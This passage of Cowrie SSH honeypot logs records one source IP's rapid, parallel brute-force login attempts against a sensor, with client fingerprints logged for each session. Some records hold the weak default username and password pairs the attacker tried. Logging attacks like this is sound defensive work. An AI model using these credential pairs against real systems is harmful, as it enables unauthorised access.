{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.464343Z","src_ip":"87.120.191.13","session":"4361a2f1ecd9"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"password","message":"login attempt [ftpuser/password] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.485232Z","src_ip":"87.120.191.13","session":"28bb065371b8"}
{"eventid":"cowrie.login.failed","username":"student","password":"password","message":"login attempt [student/password] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.504902Z","src_ip":"87.120.191.13","session":"846aaa943767"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.576098Z","src_ip":"87.120.191.13","session":"107f22b696ae"}
{"eventid":"cowrie.login.failed","username":"pi","password":"password","message":"login attempt [pi/password] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:37.686092Z","src_ip":"87.120.191.13","session":"4361a2f1ecd9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.450726Z","src_ip":"87.120.191.13","session":"861a3f8dc284"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55078,"dst_ip":"1.2.3.4","dst_port":22,"session":"578e54c5cb29","protocol":"ssh","message":"New connection: 87.120.191.13:55078 (1.2.3.4:22) [session: 578e54c5cb29]","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.499868Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.505164Z","src_ip":"87.120.191.13","session":"8f4092d70eab"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.517855Z","src_ip":"87.120.191.13","session":"0cfd5494215d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55082,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9f8b1b2ba4e","protocol":"ssh","message":"New connection: 87.120.191.13:55082 (1.2.3.4:22) [session: a9f8b1b2ba4e]","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.534064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.543757Z","src_ip":"87.120.191.13","session":"578e54c5cb29"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.544728Z","src_ip":"87.120.191.13","session":"578e54c5cb29"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.546988Z","src_ip":"87.120.191.13","session":"28bb065371b8"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.558211Z","src_ip":"87.120.191.13","session":"846aaa943767"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55094,"dst_ip":"1.2.3.4","dst_port":22,"session":"f228fe2798c5","protocol":"ssh","message":"New connection: 87.120.191.13:55094 (1.2.3.4:22) [session: f228fe2798c5]","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.563666Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55100,"dst_ip":"1.2.3.4","dst_port":22,"session":"de77bd0a5e29","protocol":"ssh","message":"New connection: 87.120.191.13:55100 (1.2.3.4:22) [session: de77bd0a5e29]","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.564639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.565292Z","src_ip":"87.120.191.13","session":"a9f8b1b2ba4e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.565934Z","src_ip":"87.120.191.13","session":"a9f8b1b2ba4e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55114,"dst_ip":"1.2.3.4","dst_port":22,"session":"c40e39e7c731","protocol":"ssh","message":"New connection: 87.120.191.13:55114 (1.2.3.4:22) [session: c40e39e7c731]","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.577312Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.610101Z","src_ip":"87.120.191.13","session":"de77bd0a5e29"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.610804Z","src_ip":"87.120.191.13","session":"de77bd0a5e29"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.612608Z","src_ip":"87.120.191.13","session":"c40e39e7c731"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.613382Z","src_ip":"87.120.191.13","session":"c40e39e7c731"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.618576Z","src_ip":"87.120.191.13","session":"f228fe2798c5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.619186Z","src_ip":"87.120.191.13","session":"f228fe2798c5"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.644882Z","src_ip":"87.120.191.13","session":"107f22b696ae"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55118,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fe5721ecd88","protocol":"ssh","message":"New connection: 87.120.191.13:55118 (1.2.3.4:22) [session: 2fe5721ecd88]","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.675364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.707607Z","src_ip":"87.120.191.13","session":"2fe5721ecd88"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.708227Z","src_ip":"87.120.191.13","session":"2fe5721ecd88"}
{"eventid":"cowrie.login.failed","username":"noc","password":"12345678","message":"login attempt [noc/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.715430Z","src_ip":"87.120.191.13","session":"578e54c5cb29"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.733530Z","src_ip":"87.120.191.13","session":"4361a2f1ecd9"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.751724Z","src_ip":"87.120.191.13","session":"a9f8b1b2ba4e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55132,"dst_ip":"1.2.3.4","dst_port":22,"session":"e72878e10dcb","protocol":"ssh","message":"New connection: 87.120.191.13:55132 (1.2.3.4:22) [session: e72878e10dcb]","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.787736Z"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"12345678","message":"login attempt [ubnt/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.867026Z","src_ip":"87.120.191.13","session":"de77bd0a5e29"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345678","message":"login attempt [ftpuser/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.877692Z","src_ip":"87.120.191.13","session":"f228fe2798c5"}
{"eventid":"cowrie.login.failed","username":"student","password":"12345678","message":"login attempt [student/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.889820Z","src_ip":"87.120.191.13","session":"c40e39e7c731"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.906389Z","src_ip":"87.120.191.13","session":"e72878e10dcb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:38.907423Z","src_ip":"87.120.191.13","session":"e72878e10dcb"}
{"eventid":"cowrie.login.failed","username":"admin","password":"12345678","message":"login attempt [admin/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:39.721147Z","src_ip":"87.120.191.13","session":"2fe5721ecd88"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.309792Z","src_ip":"87.120.191.13","session":"a9f8b1b2ba4e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.322997Z","src_ip":"87.120.191.13","session":"578e54c5cb29"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55140,"dst_ip":"1.2.3.4","dst_port":22,"session":"df062185c881","protocol":"ssh","message":"New connection: 87.120.191.13:55140 (1.2.3.4:22) [session: df062185c881]","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.343428Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.348914Z","src_ip":"87.120.191.13","session":"c40e39e7c731"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.351630Z","src_ip":"87.120.191.13","session":"f228fe2798c5"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.359348Z","src_ip":"87.120.191.13","session":"de77bd0a5e29"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55148,"dst_ip":"1.2.3.4","dst_port":22,"session":"4526d66c241c","protocol":"ssh","message":"New connection: 87.120.191.13:55148 (1.2.3.4:22) [session: 4526d66c241c]","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.384701Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55162,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a866e6a23ab","protocol":"ssh","message":"New connection: 87.120.191.13:55162 (1.2.3.4:22) [session: 8a866e6a23ab]","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.385601Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55166,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c372f3237d9","protocol":"ssh","message":"New connection: 87.120.191.13:55166 (1.2.3.4:22) [session: 0c372f3237d9]","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.393299Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345678","message":"login attempt [pi/12345678] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.407669Z","src_ip":"87.120.191.13","session":"e72878e10dcb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.492281Z","src_ip":"87.120.191.13","session":"df062185c881"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.492906Z","src_ip":"87.120.191.13","session":"df062185c881"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":55142,"dst_ip":"1.2.3.4","dst_port":22,"session":"5da0a80b8c68","protocol":"ssh","message":"New connection: 87.120.191.13:55142 (1.2.3.4:22) [session: 5da0a80b8c68]","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.497248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.497905Z","src_ip":"87.120.191.13","session":"5da0a80b8c68"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.518843Z","src_ip":"87.120.191.13","session":"4526d66c241c"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:40.527536Z","src_ip":"87.120.191.13","session":"8a866e6a23ab"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.co